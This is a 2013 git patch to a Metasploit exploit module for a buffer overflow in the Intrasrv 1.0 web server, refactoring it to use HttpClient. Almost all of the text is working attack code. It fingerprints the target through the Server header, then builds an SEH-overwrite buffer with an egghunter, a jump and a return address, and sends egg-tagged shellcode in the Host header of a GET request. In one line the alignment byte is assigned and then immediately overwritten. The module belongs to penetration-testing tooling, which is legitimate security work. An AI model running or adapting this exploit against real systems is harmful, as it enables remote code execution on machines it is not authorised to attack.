From a35d548979c83a69cdc9008568fb9503621018e5 Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Mon, 12 Aug 2013 10:01:01 -0400 Subject: [PATCH] Use HttpClient --- modules/exploits/windows/http/intrasrv_bof.rb | 39 ++++++++----------- 1 file changed, 17 insertions(+), 22 deletions(-) diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb index 4755b59993..bfe752ae45 100644 --- a/modules/exploits/windows/http/intrasrv_bof.rb +++ b/modules/exploits/windows/http/intrasrv_bof.rb @@ -10,7 +10,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Egghunter def initialize(info={}) @@ -57,24 +57,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => "May 30 2013", 'DefaultTarget' => 0)) - - register_options( - [ - OptPort.new('RPORT', [true, 'The remote port', 80]) - ], self.class) end def check - begin - connect - rescue - print_error("Could not connect to target!") - return Exploit::CheckCode::Safe - end - sock.put("GET / HTTP/1.0\r\n") - res = sock.get + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/" + }) - if res and res =~ /intrasrv 1.0/ + if res and res.headers['Server'] =~ /intrasrv 1.0/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe @@ -88,19 +79,23 @@ class Metasploit3 < Msf::Exploit::Remote }) # setup buffer - buf = rand_text_alpha(target['Offset']-128) # junk to egghunter + buf = rand_text(target['Offset']-128) # junk to egghunter buf << make_nops(8) + hunter # nopsled + egghunter at offset-128 - buf << rand_text_alpha(target['Offset']-buf.length) # more junk to offset + buf << rand_text(target['Offset']-buf.length) # more junk to offset buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter buf << [target.ret].pack("V*") # seh - # attach egg tag to payload - shellcode = egg + egg + # Setup payload + shellcode = rand_text(1) # align payload + shellcode = egg + egg # attach egg tags shellcode << payload.encoded print_status("Sending buffer...") - connect - sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}") - disconnect + send_request_cgi({ + 'method' => 'GET', + 'uri' => "/", + 'vhost' => buf, + 'data' => shellcode + }) end end